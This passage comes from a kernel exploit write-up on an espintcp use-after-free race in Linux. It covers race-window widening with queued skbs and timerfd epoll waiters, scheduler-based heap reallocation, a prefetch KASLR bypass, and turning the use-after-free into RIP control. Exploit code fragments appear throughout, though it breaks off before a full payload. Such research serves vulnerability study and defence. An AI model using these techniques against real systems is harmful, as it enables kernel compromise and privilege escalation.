The problem is that when the socket is held under lock_sock(), the NET_RX softirq cannot be processed immediately and the packet is pushed to the backlog (sk_backlog) instead. In that case, ACK processing can be delayed until after tcp_close() finishes. If the socket state transitions to TCP_CLOSE during the close path, then when the backlog is processed later, ->sk_write_space() is no longer called, and the attempt to trigger the vulnerability fails.
int tcp_v4_rcv(struct sk_buff *skb)
{
[...]
bh_lock_sock_nested(sk);
tcp_segs_in(tcp_sk(sk), skb);
ret = 0;
if (!sock_owned_by_user(sk)) {
ret = tcp_v4_do_rcv(sk, skb);
} else {
if (tcp_add_backlog(sk, skb, &drop_reason))
goto discard_and_relse;
}
bh_unlock_sock(sk);
[...]
}
That means the timer has to expire in the narrow window between the cancel_work_sync(&ctx->work) call and the call to tcp_close(). This “Delayed ACK timer expiration window” is only about 1 µs wide, which makes the race very unlikely to succeed.
On top of that, three conditions have to be satisfied at the same time: SOCK_NOSPACE must be set, Delayed ACK must be scheduled, and the espintcp worker that is inevitably scheduled during the repeated send() loop must already be finished. With all of these conditions combined, a timing window on the order of 1 µs is effectively close to impossible to hit.
void tcp_close(struct sock *sk, long timeout)
{
lock_sock(sk);
__tcp_close(sk, timeout);
release_sock(sk);
if (!sk->sk_net_refcnt)
inet_csk_clear_xmit_timers_sync(sk);
sock_put(sk);
}
static void espintcp_close(struct sock *sk, long timeout)
{
struct espintcp_ctx *ctx = espintcp_getctx(sk);
struct espintcp_msg *emsg = &ctx->partial;
strp_stop(&ctx->strp);
sk->sk_prot = &tcp_prot;
barrier();
cancel_work_sync(&ctx->work);
strp_done(&ctx->strp); ------------------------------*
|
skb_queue_purge(&ctx->out_queue); |
skb_queue_purge(&ctx->ike_queue); // <=[9] |
|
if (emsg->len) { *--- Delayed ACK timer expiration window
if (emsg->skb) |
kfree_skb(emsg->skb); |
else |
sk_msg_free(sk, &emsg->skmsg); |
} |
------------------------------*
tcp_close(sk, timeout);
}
For that reason, an intentional delay is injected by stacking skb objects in ctx->ike_queue to widen the “timer expiration window”. espintcp_close() calls skb_queue_purge(&ctx->ike_queue) to clean up received non-ESP (IKE) skb objects[9]. If the server sends IKE skb objects that match the parsing conditions of espintcp_parse() in advance, the client ends up spending extra time freeing these skb objects in the close path. That stretches the overall execution path by the same amount.
An unprivileged user can send dummy IKE skb objects as follows. First, set fcntl(O_NONBLOCK) and setsockopt(TCP_NODELAY) so that send() does not block and the data goes straight into the NET_RX path, where the skb objects are linked into ctx->ike_queue. Then send dummy data in IKE format around 30 times. This builds up multiple skb objects in ctx->ike_queue, and as a result the execution time of skb_queue_purge(&ctx->ike_queue) increases to roughly 10 µs.
int flags = fcntl(server_fd, F_GETFL, 0);
fcntl(server_fd, F_SETFL, flags | O_NONBLOCK);
int flag = 1;
if (setsockopt(server_fd, IPPROTO_TCP, TCP_NODELAY, &flag, sizeof(flag)) < 0) {
perror("setsockopt(TCP_NODELAY)");
}
unsigned char msg[7];
msg[0] = 0x00; msg[1] = 0x07; // full_len = 7
msg[2] = 0x00; msg[3] = 0x00; msg[4] = 0x00; msg[5] = 0x00; // marker = 0
msg[6] = 0x01; // extra (len > 4)
for (int i = 0; i < 30; i++) {
ssize_t n = send(server_fd, msg, sizeof(msg), 0);
}
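The framing that the dummy message above targets can be checked with a toy classifier. This follows the RFC 8229 TCP-encapsulation layout (a 16-bit big-endian length, then four bytes that are all zero for IKE via the non-ESP marker, or a non-zero SPI for ESP); it is a simplified sketch, not the exact condition set of espintcp_parse().

```c
#include <stddef.h>
#include <stdint.h>

/* Toy classifier for RFC 8229 TCP-encapsulated frames: big-endian 16-bit
 * length prefix, then a 4-byte field that is zero for IKE (non-ESP
 * marker) or a non-zero ESP SPI. Simplified; invented toy_* names. */
enum toy_frame { TOY_FRAME_BAD, TOY_FRAME_IKE, TOY_FRAME_ESP };

static enum toy_frame toy_classify(const uint8_t *buf, size_t n)
{
    if (n < 6)
        return TOY_FRAME_BAD;
    uint16_t full_len = (uint16_t)((buf[0] << 8) | buf[1]);
    if (full_len < 6 || full_len > n)
        return TOY_FRAME_BAD;
    uint32_t marker = ((uint32_t)buf[2] << 24) | ((uint32_t)buf[3] << 16) |
                      ((uint32_t)buf[4] << 8) | buf[5];
    return marker == 0 ? TOY_FRAME_IKE : TOY_FRAME_ESP;
}
```

Under this model, the 7-byte message built above (length 0x0007, zero marker, one extra byte) classifies as IKE, which is why it ends up linked into ctx->ike_queue rather than handed to the ESP receive path.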
At this point, the espintcp worker can still be scheduled even after cancel_work_sync(), so triggering a UAF requires freeing the victim object, struct espintcp_ctx, first. This ctx shares its lifetime with the socket (struct sock) and is freed together with it on the socket destruction path. More specifically, when the socket’s reference count is exhausted and the socket is destroyed, both sk and ctx are freed through the sk_destruct() path.
To free the victim object, the server side socket needs to be closed at the right time so that it enters the socket destruction path. Calling close() on the TCP socket leads to __tcp_close(). Looking at its implementation, if there are still skb objects left in sk->sk_receive_queue [10], the code takes the path that sends an RST instead of performing a normal FIN shutdown [11]. This behavior corresponds to what is described in RFC 2525, section 2.17.
void __tcp_close(struct sock *sk, long timeout)
{
bool data_was_unread = false;
[...]
while ((skb = skb_peek(&sk->sk_receive_queue)) != NULL) {
u32 end_seq = TCP_SKB_CB(skb)->end_seq;
if (TCP_SKB_CB(skb)->tcp_flags & TCPHDR_FIN)
end_seq--;
if (after(end_seq, tcp_sk(sk)->copied_seq))
data_was_unread = true; // <=[10]
tcp_eat_recv_skb(sk, skb);
}
/* If socket has been already reset (e.g. in tcp_reset()) - kill it. */
if (sk->sk_state == TCP_CLOSE)
goto adjudge_to_death;
[...]
if (sk->sk_state != TCP_CLOSE) {
if (tcp_check_oom(sk, 0)) {
tcp_set_state(sk, TCP_CLOSE);
tcp_send_active_reset(sk, GFP_ATOMIC, // <=[11]
SK_RST_REASON_TCP_ABORT_ON_MEMORY);
__NET_INC_STATS(sock_net(sk),
LINUX_MIB_TCPABORTONMEMORY);
} else if (!check_net(sock_net(sk))) {
/* Not possible to send reset; just close */
tcp_set_state(sk, TCP_CLOSE);
}
}
[...]
}
Because many skb objects are already queued in the server side sk->sk_receive_queue to trigger the vulnerability, calling close() takes the path that sends an RST instead of performing a normal FIN based shutdown. As a result, TCP’s 4-way handshake does not happen, and ctx is freed together with sk inside espintcp_close() before the espintcp worker runs. That is where the UAF becomes possible.
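The RST-on-close behavior is easy to observe from user space with a minimal loopback pair. The sketch below (error handling mostly omitted, helper name invented) leaves unread data in the accepted socket's receive queue, closes it, and checks that the peer sees ECONNRESET instead of a clean end-of-stream.

```c
#include <arpa/inet.h>
#include <errno.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

/* Demonstrates RFC 2525 section 2.17: closing a TCP socket that still has
 * unread data in sk->sk_receive_queue sends an RST, not a FIN.
 * Returns the errno observed by the peer's read() (0 on clean EOF). */
static int rst_on_close_errno(void)
{
    int lfd = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in addr = { .sin_family = AF_INET };
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    socklen_t alen = sizeof(addr);

    if (bind(lfd, (struct sockaddr *)&addr, sizeof(addr)) < 0)
        return -1;
    listen(lfd, 1);
    getsockname(lfd, (struct sockaddr *)&addr, &alen);

    int cfd = socket(AF_INET, SOCK_STREAM, 0);
    if (connect(cfd, (struct sockaddr *)&addr, sizeof(addr)) < 0)
        return -1;
    int afd = accept(lfd, NULL, NULL);

    send(cfd, "unread", 6, 0);   /* lands in afd's receive queue */
    usleep(100 * 1000);          /* let the segment arrive */
    close(afd);                  /* unread data => RST instead of FIN */
    usleep(100 * 1000);          /* let the RST arrive */

    char buf[8];
    int err = (read(cfd, buf, sizeof(buf)) < 0) ? errno : 0;
    close(cfd);
    close(lfd);
    return err;
}
```

This is the same property the exploit leans on: as long as skb objects remain queued, close() aborts the connection instead of walking the orderly FIN teardown.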
After that, when kworker enters worker_thread() and calls move_linked_works() to pick up the espintcp worker handler, a UAF on ctx is triggered. This happens because ctx->work was linked into the queue at the time schedule_work() was called, so the code still follows that work item even after ctx has been freed on the socket destruction path.
More concretely, during the list_for_each_entry_safe_from(work, n, NULL, entry) walk inside move_linked_works(), the already freed ctx->work is dereferenced, and the UAF occurs at that point.
static void move_linked_works(struct work_struct *work, struct list_head *head,
struct work_struct **nextp)
{
struct work_struct *n;
/*
* Linked worklist will always end before the end of the list,
* use NULL for list head.
*/
list_for_each_entry_safe_from(work, n, NULL, entry) {
list_move_tail(&work->entry, head);
if (!(*work_data_bits(work) & WORK_STRUCT_LINKED))
break;
}
[...]
}
At this point in the race scenario, the current step can be summarized as the following diagram.
Forcing the RST Fast Path
In the previous step of the scenario, the server side socket had to be closed before tcp_close() was called on the client side. If the order is reversed, the victim object is freed in the server side close path, and the attempt to trigger the UAF fails.
Once a close(server_sk) step is added to the race scenario, another timing constraint is introduced. That makes the probability of triggering the vulnerability even lower. To improve the stability of the race, this step needs to be skipped.
To do that, before the actual race scenario starts, the server sends dummy data to the client that matches neither the ESP nor the IKE format recognized by espintcp_parse(). When the client socket is then closed, the path goes through an RST instead of a FIN. This not only avoids the 4-way handshake, but also allows sk and ctx to be freed regardless of whether the server side socket is explicitly closed.
More specifically, if the user sends dummy data as shown below, the skb objects are linked into sk->sk_receive_queue rather than ctx->ike_queue.
int flags = fcntl(conn_fd, F_GETFL, 0);
fcntl(conn_fd, F_SETFL, flags | O_NONBLOCK);
int flag = 1;
if (setsockopt(conn_fd, IPPROTO_TCP, TCP_NODELAY, &flag, sizeof(flag)) < 0) {
perror("setsockopt(TCP_NODELAY)");
}
char buf[10];
memset(buf, 'A', sizeof(buf));
for (int i = 0; i < RECV_QUEUE_SPRAY; i++) {
ssize_t n = write(conn_fd, buf, 7);
}
At this point, small chunks of data are sent many times so that the increase of sk->sk_rmem_alloc is kept low while as many skb objects as possible are linked into sk->sk_receive_queue. The goal is to make the loop inside __tcp_close() that calls tcp_eat_recv_skb() run for as long as possible[12].
void __tcp_close(struct sock *sk, long timeout)
{
bool data_was_unread = false;
[...]
while ((skb = skb_peek(&sk->sk_receive_queue)) != NULL) {
u32 end_seq = TCP_SKB_CB(skb)->end_seq;
if (TCP_SKB_CB(skb)->tcp_flags & TCPHDR_FIN)
end_seq--;
if (after(end_seq, tcp_sk(sk)->copied_seq))
data_was_unread = true;
tcp_eat_recv_skb(sk, skb); // <=[12]
}
[...]
}
This is done to secure an additional race window for heap spraying later in the race scenario. The details of that part are described in a later step.
To sum up, this step of sending dummy data serves two purposes.
First, by placing skb objects in sk->sk_receive_queue instead of ctx->ike_queue, the path is forced into the RST case where sk and ctx are freed regardless of whether the server side socket is closed.
Second, by sending a large number of small messages and building up as many skb objects as possible in sk->sk_receive_queue, the execution time of the tcp_eat_recv_skb() loop inside __tcp_close() is intentionally stretched. This creates an additional race window that can be used for heap spraying in the later part of the scenario.
At this step, the updated scenario can be summarized as the following diagram.
Extending the Window with timerfd
By sending around 30 IKE skb objects, the race window can be extended to roughly 10 µs, but that is still not enough for the scenario to succeed reliably. In theory, sending more IKE skb objects would widen the race window further. In practice, however, doing so reduces the number of skb objects that can be linked into sk->sk_receive_queue, which shortens the maximum delay in the __tcp_close() path. Overall, this makes it difficult to extend the race window any further.
At this point, a different approach is needed. For this step, Jann Horn’s timerfd technique is used to extend the existing race window from about 10 µs to roughly 40000 µs. This technique is particularly effective in a CONFIG_PREEMPT=n environment.
The idea is to attach a large number of epoll waiters to the waitqueue of a timerfd, and then make the kernel spend a long time running when the timerfd_tmrproc() handler is invoked in hardirq context on timer expiration. In that path, __wake_up_common() ends up walking the list linearly, which artificially widens the race window.
static int __wake_up_common(struct wait_queue_head *wq_head, unsigned int mode,
int nr_exclusive, int wake_flags, void *key)
{
wait_queue_entry_t *curr, *next;
lockdep_assert_held(&wq_head->lock);
curr = list_first_entry(&wq_head->head, wait_queue_entry_t, entry);
if (&curr->entry == &wq_head->head)
return nr_exclusive;
list_for_each_entry_safe_from(curr, next, &wq_head->head, entry) {
unsigned flags = curr->flags;
int ret;
ret = curr->func(curr, mode, wake_flags, key); // ep_poll_callback()
if (ret < 0)
break;
if (ret && (flags & WQ_FLAG_EXCLUSIVE) && !--nr_exclusive)
break;
}
return nr_exclusive;
}
Because this hrtimer runs in hardirq context, the kernel stays busy while __wake_up_common() runs for a long time. Any pending softirq is then handled immediately after the hardirq returns. This makes it very useful for widening the window until the Delayed ACK timer expires.
Looking at the interrupt call stack, if the Delayed ACK timer expires successfully while an artificial delay is injected using timerfd, the event is very likely to be handled through the following path.
instr_sysvec_apic_timer_interrupt() // DEFINE_IDTENTRY_SYSVEC(sysvec_apic_timer_interrupt)
run_sysvec_on_irqstack_cond()
irq_enter_rcu()
__sysvec_apic_timer_interrupt()
local_apic_timer_interrupt()
hrtimer_interrupt(dev) // evt->event_handler(evt)
__hrtimer_run_queues()
__run_hrtimer()
timerfd_tmrproc()
timerfd_triggered()
wake_up_locked_poll()
__wake_up_locked_key()
__wake_up_common() // Long-running wakeup scan (epoll waiters)
if (!tick_program_event(expires_next, 0))
if (++retries < 3) goto retry;
__hrtimer_run_queues()
__run_hrtimer()
tick_nohz_handler()
tick_sched_handle()
update_process_times()
run_local_timers()
if (jiffies >= base->next_expiry)
raise_timer_softirq(TIMER_SOFTIRQ)
irq_exit_rcu()
__irq_exit_rcu()
if (local_softirq_pending())
invoke_softirq()
__do_softirq()
handle_softirqs()
pending = local_softirq_pending();
run_timer_softirq() // h->action()
...
tcp_delack_timer() // Delayed ACK timer handler
First, execution enters through the APIC timer interrupt, and the timerfd_tmrproc() handler attached to the hrtimer runs from hrtimer_interrupt(). Along this path, the wakeup walk in __wake_up_common() consumes time. After that, the flow goes through the retry path and reaches tick_nohz_handler(), where expiration of jiffies-based timers is detected and TIMER_SOFTIRQ is raised. Finally, on the interrupt exit path, the softirq is processed and the Delayed ACK timer handler, tcp_delack_timer(), is executed.
With timerfd added, the current scenario can be summarized as the following diagram.
Winning the Reallocation Race with Scheduling
The steps so far make it possible to trigger a UAF write in the espintcp worker context. One problem still remains: right after espintcp_close(), which frees ctx, returns, the espintcp worker that performs the UAF write runs almost immediately. That leaves practically no time for the attacker to perform heap spraying.
The espintcp worker is queued on the bound workqueue system_percpu_wq, so its execution is guaranteed to happen after ctx is freed. The trade-off is that the gap between the moment ctx is freed and the moment the worker actually runs and performs the UAF write becomes very short. In practice, this gap is around 7 µs, and reliably performing heap spraying within that window is not easy.
There are two approaches to address this problem.
The first is pure race-based reallocation. This approach targets the brief moment right after ctx is freed in espintcp_close(), and has a heap spray thread on another CPU race to reallocate ctx. For this to work, ctx needs to be moved to the node partial list first so that it can be reallocated from another CPU.
The advantage of this approach is that it is relatively simple to implement, but the downside is clear. The gap between freeing ctx and the worker running is only about 7 µs, which means there are only one or two practical chances to attempt an allocation. As a result, it depends heavily on timing and the success rate ends up being very low. This adds another tiny race window on top of an already complex race scenario, so this approach is not used at this step.
The second approach is to take advantage of the properties of the CFS/EEVDF schedulers and “win” the reallocation race. This focuses on creating a situation where the heap spray thread can run before the worker.
In a typical Linux distribution environment, an unprivileged user cannot lower the nice value to a negative number via setpriority(), nor can they use real-time scheduling classes such as SCHED_RR. Because of that, directly raising the priority of the heap spray thread over the worker is not an option. Instead, an indirect way is used to disturb the scheduling order.
CFS tracks the accumulated execution time of each task as vruntime and, based on that, selects the best eligible task from the runqueue by considering the calculated deadline and the eligibility conditions.
static int vruntime_eligible(struct cfs_rq *cfs_rq, u64 vruntime)
{
struct sched_entity *curr = cfs_rq->curr;
s64 avg = cfs_rq->avg_vruntime;
long load = cfs_rq->avg_load;
if (curr && curr->on_rq) {
unsigned long weight = scale_load_down(curr->load.weight);
avg += entity_key(cfs_rq, curr) * weight;
load += weight;
}
return avg >= (s64)(vruntime - cfs_rq->min_vruntime) * load;
}
Accordingly, the goal of this step is to migrate the heap spray thread onto the same CPU runqueue as the espintcp worker, thereby introducing a new scheduling case in which it can be selected before the espintcp worker.
To do that, the heap spray thread is created from cpu1 with pthread_attr_setaffinity_np() restricting it to cpu0, so that it migrates to cpu0, where espintcp_close() runs. pthread_create() then issues the sched_setaffinity() syscall internally to apply the CPU affinity to the new thread. This sequence of operations is performed within the delay window that was injected in the previous step using the walk over sk->sk_receive_queue inside __tcp_close() [12].
pthread_attr_t attr;
cpu_set_t cpus;
pthread_t th;
pthread_attr_init(&attr);
CPU_ZERO(&cpus);
CPU_SET(0, &cpus); // cpu0 only
if (pthread_attr_setaffinity_np(&attr, sizeof(cpu_set_t), &cpus) != 0) {
perror("pthread_attr_setaffinity_np");
exit(1);
}
if (pthread_create(&th, &attr, key_spray, NULL) != 0) {
perror("pthread_create");
exit(1);
}
When a task migration happens due to an affinity change, the kernel repositions the task’s vruntime and deadline against the avg_vruntime of the new runqueue, based on the lag(vlag) that was computed at dequeue time. This process is meant to preserve fairness by keeping the lag, but in certain situations it can end up placing the task ahead of other runnable entities on the same CPU, so that it is selected first.
static void update_entity_lag(struct cfs_rq *cfs_rq, struct sched_entity *se)
{
s64 vlag, limit;
WARN_ON_ONCE(!se->on_rq);
vlag = avg_vruntime(cfs_rq) - se->vruntime;
limit = calc_delta_fair(max_t(u64, 2*se->slice, TICK_NSEC), se);
se->vlag = clamp(vlag, -limit, limit);
}
static bool
dequeue_entity(struct cfs_rq *cfs_rq, struct sched_entity *se, int flags)
{
[...]
update_entity_lag(cfs_rq, se);
if (sched_feat(PLACE_REL_DEADLINE) && !sleep) {
se->deadline -= se->vruntime;
se->rel_deadline = 1;
}
[...]
}
static void
place_entity(struct cfs_rq *cfs_rq, struct sched_entity *se, int flags)
{
u64 vslice, vruntime = avg_vruntime(cfs_rq);
s64 lag = 0;
if (!se->custom_slice)
se->slice = sysctl_sched_base_slice;
vslice = calc_delta_fair(se->slice, se);
if (sched_feat(PLACE_LAG) && cfs_rq->nr_queued && se->vlag) {
struct sched_entity *curr = cfs_rq->curr;
unsigned long load;
lag = se->vlag;
[...]
}
se->vruntime = vruntime - lag;
if (se->rel_deadline) {
se->deadline += se->vruntime;
se->rel_deadline = 0;
return;
}
if (sched_feat(PLACE_DEADLINE_INITIAL) && (flags & ENQUEUE_INITIAL))
vslice /= 2;
se->deadline = se->vruntime + vslice;
}
The call stack for this task migration is as follows. After the heap spray thread is migrated through the sched_setaffinity() system call path, the TIF_NEED_RESCHED flag is set on the espintcp_close() task that is currently running on cpu0. Because of that, scheduling is triggered on the syscall exit path after espintcp_close() returns (or TIF_NEED_RESCHED may already have been set even earlier).
SYSCALL_DEFINE3(sched_setaffinity)
sched_setaffinity(pid, new_mask)
__sched_setaffinity(pid, new_mask)
__set_cpus_allowed_ptr(p, ctx)
__set_cpus_allowed_ptr_locked(p)
affine_move_task()
move_queued_task(rq=rp_cpu1, p, new_cpu=cpu0)
deactivate_task(rq_cpu1, p, DEQUEUE_NOCLOCK) // Dequeue the heap spray thread from the old cpu1 rq
dequeue_task(rq_cpu1, p)
dequeue_task_fair(rq_cpu1)
dequeue_entities(rq_cpu1)
dequeue_entity(rq_cpu1)
update_entity_lag(rq_cpu1)
se->vlag = clamp(vlag, -limit, limit); // Save vlag
set_task_cpu(p, cpu0)
activate_task(rq_cpu0, p, 0) // Enqueue the heap spray thread onto the cpu0 rq
enqueue_task(rq_cpu0, p)
enqueue_task_fair(rq_cpu0)
enqueue_entity(rq_cpu0)
place_entity(rq_cpu0)
se->vruntime = vruntime - lag; // Apply the saved vlag
wakeup_preempt(rq_cpu0)
resched_curr(rq_cpu0)
__resched_curr(rq_cpu0, TIF_NEED_RESCHED)
set_nr_and_not_polling(TIF_NEED_RESCHED)
set_ti_thread_flag(cpu0, TIF_NEED_RESCHED) // Set TIF_NEED_RESCHED on the espintcp_close task
smp_send_reschedule(cpu0) // Send sysvec_reschedule_ipi to cpu0
Of course, the exact scheduling outcome under CFS depends on many factors and cannot be predicted in a fully deterministic way, and because of the various mechanisms that exist to preserve fairness, it is also difficult to cause dramatic changes in ordering. Even so, this step makes it possible to introduce a new case in which the heap spray thread can slip in before the worker runs right after ctx is freed. As a result, reallocation can be nudged even within a very short window of around 7 µs. That said, this process inherently relies on indirect influence and probabilistic attempts, so repeated trials are required to achieve a sufficient success rate.
In addition, there is room to combine this with another idea. A thread can be created in advance and put to sleep, then woken up at the right time, or cycled through sleep and wake-up repeatedly, to steer it toward a relatively smaller vruntime. This may create more favorable conditions for increasing the lag value. However, this idea has not been validated in practice, and due to the lag averaging performed in place_entity(), it is unlikely to produce a meaningful effect.
In any case, this step still looks like an area with room for further refinement.
The Full Timeline
The following diagram shows the final sequence that achieves a Use-After-Free with this espintcp vulnerability.
Some kernel call stacks and the exact entry points of softirqs are omitted for the sake of clarity.
Exploit Sequence
Bypassing KASLR via Prefetch Attack
Before getting into the actual exploit: it uses a Prefetch Side-Channel Attack to bypass KASLR. Because the race scenario in this vulnerability is highly complex, using the same vulnerability twice, once for an information leak and once for triggering the UAF, is not practical. For that reason, the KASLR bypass relies on a separate side-channel technique to improve exploit reliability.
On microarchitectures where Meltdown mitigations are applied in hardware, KPTI is often disabled. In such environments, it is already well known that the kernel text can be inferred using a Prefetch Attack.
This exploit takes advantage of that property to compute the locations of kernel symbols and build the ROP payload.
From UAF to Exploitation Primitive
Now this UAF write needs to be promoted into a primitive that can be used for an actual exploit. Under the current race scenario, there are two candidate objects that can be reallocated at the freed address: struct espintcp_ctx and struct sock. In other words, the same UAF write can end up overwriting either type of object.
struct espintcp_ctx {
struct strparser strp;
struct sk_buff_head ike_queue;
struct sk_buff_head out_queue;
struct espintcp_msg partial;
void (*saved_data_ready)(struct sock *sk);
void (*saved_write_space)(struct sock *sk);
void (*saved_destruct)(struct sock *sk);
struct work_struct work;
bool tx_running;
};
struct sock {
/*
* Now struct inet_timewait_sock also uses sock_common, so please just
* don't add nothing before this first member (__sk_common) --acme
*/
struct sock_common __sk_common;
#define sk_node __sk_common.skc_node
#define sk_nulls_node __sk_common.skc_nulls_node
#define sk_refcnt __sk_common.skc_refcnt
#define sk_tx_queue_mapping __sk_common.skc_tx_queue_mapping
[...]
};
Looking at the workqueue execution flow, the first place where the freed pointer is dereferenced is on the ctx side. kworker touches struct espintcp_ctx first, and only follows sk later. For this reason, overwriting ctx is a more direct primitive for hijacking control flow than overwriting sk.
In particular, kworker calls process_one_work() to run a work handler, and this function directly calls the function pointer work->func stored in struct work_struct. Since struct espintcp_ctx embeds struct work_struct work, overwriting ctx->work.func via the UAF write allows control flow to be redirected to an arbitrary address in kworker context. Because ctx->work is passed as an argument, it also makes stack pivoting possible. The process_one_work() site is the key path that promotes the current UAF write into a RIP control primitive.
struct work_struct {
atomic_long_t data;
struct list_head entry;
work_func_t func;
#ifdef CONFIG_LOCKDEP
struct lockdep_map lockdep_map;
#endif
};
static void process_one_work(struct worker *worker, struct work_struct *work)
__releases(&pool->lock)
__acquires(&pool->lock)
{
[...]
worker->current_func = work->func;
[...]
worker->current_func(work);
[...]
}
The call stack from waking up kworker to reaching process_one_work() looks as follows.
worker_thread()
work = list_first_entry(&pool->worklist)
assign_work(work, &worker->scheduled) // work: &ctx->work
move_linked_works(work)
list_for_each_entry_safe_from(work, n, NULL, entry)
list_move_tail(&work->entry, head)
if (!(*work_data_bits(work) & WORK_STRUCT_LINKED)) break;
process_scheduled_works()
process_one_work()
Among these frames, move_linked_works() is the first place that dereferences the freed ctx->work. It starts from the current UAF object, ctx->work, and walks the list, moving each entry to &worker->scheduled.
#define work_data_bits(work) ((unsigned long *)(&(work)->data))
static void move_linked_works(struct work_struct *work, struct list_head *head,
struct work_struct **nextp)
{
struct work_struct *n;
/*
* Linked worklist will always end before the end of the list,
* use NULL for list head.
*/
list_for_each_entry_safe_from(work, n, NULL, entry) {
list_move_tail(&work->entry, head);
if (!(*work_data_bits(work) & WORK_STRUCT_LINKED)) // <=[13]
break;
}
[...]
}
static bool assign_work(struct work_struct *work, struct worker *worker,
struct work_struct **nextp)
{
[...]
move_linked_works(work, &worker->scheduled, nextp);
return true;
}
At this point, list_move_tail() internally calls __list_del_entry_valid() to perform a list integrity check.
static __always_inline bool __list_del_entry_valid(struct list_head *entry)
{
bool ret = true;
if (!IS_ENABLED(CONFIG_DEBUG_LIST)) {
struct list_head *prev = entry->prev;
struct list_head *next = entry->next;
if (likely(prev->next == entry && next->prev == entry))
return true;
ret = false;
}
ret &= __list_del_entry_valid_or_report(entry);
return ret;
}
static inline void __list_del_entry(struct list_head *entry)
{
if (!__list_del_entry_valid(entry))
return;
__list_del(entry->prev, entry->next);
}
static inline void list_move_tail(struct list_head *list,
struct list_head *head)
{
__list_del_entry(list);
list_add_tail(list, head);
}
The current test kernel is built from the Ubuntu 25.10 configuration, so CONFIG_DEBUG_LIST is disabled. Because of that, the kernel does not panic in the __list_del_entry_valid_or_report() path. This allows the attacker to keep execution going by placing any readable, valid kernel address into entry->prev when ctx is reallocated.
In this state, list_move_tail() fails to unlink the node and ends up only executing list_add_tail(). As a result, an invalid node remains in pool->worklist. If the walk in move_linked_works() continues, the next pointer n computed by the list_for_each_entry_safe_from() macro ends up pointing to an invalid address. On the following iteration, that invalid pointer is treated as a work_struct, and list manipulation starts to run out of control. For this reason, in this scenario, the WORK_STRUCT_LINKED flag must be added to work->data using a | operation, so that the loop breaks immediately after the first iteration[13].
If the same exploit is attempted on a kernel with CONFIG_DEBUG_LIST enabled, simply writing an arbitrary kernel address into entry->prev is not enough to pass the validation step. In that case, slab allocation alignment has to be matched and a real object containing a struct list_head must be placed at the ctx->work.entry position using a cross cache technique. Only then can the list integrity check be bypassed and execution be driven along the same path.
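The CONFIG_DEBUG_LIST=n behavior that the exploit relies on can be modeled in user space. In the sketch below (toy_* names invented, mirroring the list helpers shown above), a node with bogus but readable pointers fails the validity check silently, the unlink is skipped, and the tail add still runs, leaving a stale node behind.

```c
/* Toy model of list_move_tail() on a UAF-controlled node when
 * CONFIG_DEBUG_LIST is off: validation fails without a panic, the
 * unlink is skipped, but list_add_tail() still executes. */
struct toy_list_head { struct toy_list_head *next, *prev; };

static void toy_init_head(struct toy_list_head *h) { h->next = h->prev = h; }

/* models __list_del_entry_valid() with CONFIG_DEBUG_LIST=n */
static int toy_del_entry_valid(struct toy_list_head *e)
{
    return e->prev->next == e && e->next->prev == e;
}

static void toy_add_tail(struct toy_list_head *n, struct toy_list_head *h)
{
    n->prev = h->prev;
    n->next = h;
    h->prev->next = n;
    h->prev = n;
}

/* models list_move_tail(): returns 1 if the unlink happened, 0 if only
 * the add ran (the corrupted-node case described in the article) */
static int toy_move_tail(struct toy_list_head *e, struct toy_list_head *h)
{
    int valid = toy_del_entry_valid(e);
    if (valid) {
        e->prev->next = e->next;
        e->next->prev = e->prev;
    }
    toy_add_tail(e, h);
    return valid;
}
```

This is exactly why any readable kernel address in entry->prev keeps execution going, and why the leftover node in pool->worklist later forces the mdelay() trick at the end of the exploit.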
Next, process_one_work() also has a set of conditions that must be satisfied before reaching a point where RIP control is possible. This section lists, in order, which values need to be set inside process_one_work() so that execution continues and eventually reaches the function pointer call site.
struct pool_workqueue {
struct worker_pool *pool; /* I: the associated pool */
struct workqueue_struct *wq; /* I: the owning workqueue */
[...]
u64 stats[PWQ_NR_STATS];
[...]
} __aligned(1 << WORK_STRUCT_PWQ_SHIFT);
static inline struct pool_workqueue *work_struct_pwq(unsigned long data)
{
return (struct pool_workqueue *)(data & WORK_STRUCT_PWQ_MASK); // WORK_STRUCT_PWQ_MASK: 256 bytes alignment
}
static struct pool_workqueue *get_work_pwq(struct work_struct *work)
{
unsigned long data = atomic_long_read(&work->data);
if (data & WORK_STRUCT_PWQ)
return work_struct_pwq(data);
else
return NULL;
}
static void process_one_work(struct worker *worker, struct work_struct *work)
__releases(&pool->lock)
__acquires(&pool->lock)
{
struct pool_workqueue *pwq = get_work_pwq(work); // <=[14]
struct worker_pool *pool = worker->pool;
unsigned long work_data;
int lockdep_start_depth, rcu_start_depth;
bool bh_draining = pool->flags & POOL_BH_DRAINING;
[...]
strscpy(worker->desc, pwq->wq->name, WORKER_DESC_LEN); // <=[15]
[...]
pwq->stats[PWQ_STAT_STARTED]++; // <=[16] PWQ_STAT_STARTED: 0
[...]
}
- After retrieving pwq with get_work_pwq(), it is used as the basis for several operations [14]. The kernel keeps flag bits in the low-order bits of work->data and strips them with WORK_STRUCT_PWQ_MASK, so pwq is always interpreted as a 256-byte-aligned address. Since data is then copied from pwq->wq->name [15], this ends up dereferencing the pointer at pwq + 0x08. When the object is reallocated, work->data therefore needs to contain a kernel pointer that satisfies this alignment and masking rule.
- Since pwq->stats[PWQ_STAT_STARTED]++ is executed [16], the memory at pwq + 0xa8 needs to be writable kernel memory.
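The masking rule can be sketched numerically. The flag bit position below is illustrative rather than the kernel's actual value; the point is that whatever is planted in work->data is read back with its low 8 bits cleared, so a non-aligned pointer would be dereferenced at a different, aligned-down address.

```c
#include <stdint.h>

/* Sketch of the work->data constraint from get_work_pwq(): flags live in
 * the low bits and the mask strips them, yielding a 256-byte-aligned
 * address (1 << WORK_STRUCT_PWQ_SHIFT == 256). TOY_* values illustrative. */
#define TOY_WORK_STRUCT_PWQ       ((uint64_t)1 << 2)
#define TOY_WORK_STRUCT_PWQ_MASK  (~(uint64_t)0xff)

static uint64_t toy_work_struct_pwq(uint64_t data)
{
    return data & TOY_WORK_STRUCT_PWQ_MASK;
}
```

In other words, the fake pwq pointer planted during reallocation must itself be 256-byte aligned, or the kernel will follow the aligned-down address instead of the intended one.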
Any kernel symbol that satisfies the conditions above can be used, but this article uses net_families. Since net_families is a pointer array with 46 entries, each element is laid out contiguously in 8 byte units. As a result, one of the elements in the array can be used as a pointer that can be dereferenced at the pwq+0x08 position. Of course, that element needs to be a pointer to a socket family that is already registered in the kernel.
#define AF_MAX 46
#define NPROTO AF_MAX
